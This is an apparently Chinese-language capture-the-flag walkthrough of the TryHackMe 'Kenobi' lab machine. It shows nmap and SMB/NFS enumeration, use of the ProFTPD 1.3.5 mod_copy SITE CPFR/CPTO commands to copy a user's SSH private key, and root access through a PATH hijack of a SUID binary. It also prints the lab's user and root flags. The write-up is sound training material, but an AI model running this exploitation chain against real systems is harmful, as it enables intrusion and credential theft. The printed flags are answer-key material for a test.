靶机Tryhackme之Kenobi攻略
Scan the machine with nmap, how many ports are open?
# nmap -sV 10.10.67.162 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 04:27 EDT Nmap scan report for 10.10.67.162 Host is up (0.28s latency). Not shown: 993 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 111/tcp open rpcbind 2-4 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 2049/tcp open nfs_acl 2-3 (RPC #100227) Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.17 seconds
可知本题答案为7.
Using the nmap command above, how many shares have been found?
tarting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 04:29 EDT Nmap scan report for 10.10.67.162 Host is up (0.23s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.10.67.162\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (kenobi server (Samba, Ubuntu)) | Users: 1 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.67.162\anonymous: | Type: STYPE_DISKTREE | Comment: | Users: 0 | Max Users: <unlimited> | Path: C:\home\kenobi\share | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.67.162\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none>
从扫描结果可以知道共有3个共享目录。
Once you're connected, list the files on the share. What is the file can you see?
─# smbclient //10.10.67.162/anonymous Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Sep 4 06:49:09 2019 .. D 0 Wed Sep 4 06:56:07 2019 log.txt N 12237 Wed Sep 4 06:49:09 2019 9204224 blocks of size 1024. 6877092 blocks available smb: \> get log.txt getting file \log.txt of size 12237 as log.txt (12.9 KiloBytes/sec) (average 12.9 KiloBytes/sec) smb: \> exit
可知答案为:log.txt
What port is FTP running on?
这套题从前面的nmap扫描即可得到答案: 21
What mount can we see?
# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.67.162 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 04:33 EDT Nmap scan report for 10.10.67.162 Host is up (0.23s latency). PORT STATE SERVICE 111/tcp open rpcbind | nfs-ls: Volume /var | access: Read Lookup NoModify NoExtend NoDelete NoExecute | PERMISSION UID GID SIZE TIME FILENAME | rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 . | rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 .. | rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups | rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache | rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash | rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local | rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock | rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log | rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap | rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www |_ | nfs-showmount: |_ /var * | nfs-statfs: | Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink |_ /var 9204224.0 1836540.0 6877088.0 22% 16.0T 32000 Nmap done: 1 IP address (1 host up) scanned in 3.77 seconds
从扫描结果可以知道 mount点为 /var
What is Kenobi's user flag (/home/kenobi/user.txt)?
这道题需要拿到用户flag,从题目要求需要根据proftpd的漏洞来实现,具体步骤如下:
# nc 10.10.67.162 21 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.67.162] SITE CPFR /home/kenobi/.ssh/id_rsa 350 File or directory exists, ready for destination name SITE CPTO /var/tmp/id_isa 250 Copy successful
先将秘钥文件利用proftpd的漏洞拷贝到/var/tmp目录,然后将/var目录挂载到Kali Linux本机,将该文件拷贝到Kali Linux.
─(root💀kali)-[~/vulnhubs/kenobi] └─# mkdir /mnt/kenobiNFS ┌──(root💀kali)-[~/vulnhubs/kenobi] └─# mount 10.10.67.162:/var /mnt/kenobiNFS ┌──(root💀kali)-[~/vulnhubs/kenobi] └─# ls /mnt/kenobiNFS backups cache crash lib local lock log mail opt run snap spool tmp www
然后将id_rsa从目标拷贝到Kali Linux本机:
─(root💀kali)-[~/vulnhubs/kenobi] └─# cp /mnt/kenobiNFS/tmp/id_isa .
修改id_isa权限,并利用该秘钥登录目标:
(root💀kali)-[~/vulnhubs/kenobi] └─# chmod 400 id_isa 130 ⨯ ┌──(root💀kali)-[~/vulnhubs/kenobi] └─# ssh -i id_isa kenobi@10.10.67.162 Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 103 packages can be updated. 65 updates are security updates. Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147 To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. kenobi@kenobi:~$ pwd /home/kenobi kenobi@kenobi:~$ ls share user.txt kenobi@kenobi:~$ cat user.txt d0b0f3f53b6caa532a83915e19224899
成功拿到用户Flag.
接下来是提权,根据题目步骤,需要查询到用SUID的可执行程序。
kenobi@kenobi:~$ find / -perm -u=s -type f 2> /dev/null /sbin/mount.nfs /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/bin/chfn /usr/bin/newgidmap /usr/bin/pkexec /usr/bin/passwd /usr/bin/newuidmap /usr/bin/gpasswd /usr/bin/menu /usr/bin/sudo /usr/bin/chsh /usr/bin/at /usr/bin/newgrp /bin/umount /bin/fusermount /bin/mount /bin/ping /bin/su /bin/ping6
What file looks particularly out of the ordinary?
答案:/usr/bin/menu,这不是常见的可执行程序。
Run the binary, how many options appear?
kenobi@kenobi:~$ menu *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice :1
利用Strings查看可执行程序menu里有没有文本:
kenobi@kenobi:~$ strings /usr/bin/menu /lib64/ld-linux-x86-64.so.2 libc.so.6 setuid __isoc99_scanf puts __stack_chk_fail printf system __libc_start_main __gmon_start__ GLIBC_2.7 GLIBC_2.4 GLIBC_2.2.5 UH-` AWAVA AUATL []A\A]A^A_ *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice : curl -I localhost uname -r ifconfig Invalid choice ;*3$" GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609 crtstuff.c __JCR_LIST__ deregister_tm_clones __do_global_dtors_aux completed.7594 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry menu.c __FRAME_END__ __JCR_END__ __init_array_end _DYNAMIC __init_array_start __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_csu_fini _ITM_deregisterTMCloneTable puts@@GLIBC_2.2.5 _edata __stack_chk_fail@@GLIBC_2.4 system@@GLIBC_2.2.5 printf@@GLIBC_2.2.5 __libc_start_main@@GLIBC_2.2.5 __data_start __gmon_start__ __dso_handle _IO_stdin_used __libc_csu_init __bss_start main _Jv_RegisterClasses __isoc99_scanf@@GLIBC_2.7 __TMC_END__ _ITM_registerTMCloneTable setuid@@GLIBC_2.2.5 .symtab .strtab .shstrtab .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .jcr .dynamic .got.plt .data .bss .comment
发现在执行menu的第一种选项的时候,就是在执行curl -I localhost ,注意这里并不是绝对路径,因此想办法替换curl,
echo /bin/sh > curl kenobi@kenobi:~$ chmod 777 curl kenobi@kenobi:~$ export PATH=/tmp:$PATH
将curl文件移动到/tmp目录,再次执行menu,并选择choice 1,即可拿到root权限:
mv curl /tmp kenobi@kenobi:~$ menu *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice :1 # id uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare) # ls share user.txt # cd /root # ls root.txt # cat root.txt
177b3cd8562289f37382721c28381f02
STRIVE FOR PROGRESS,NOT FOR PERFECTION
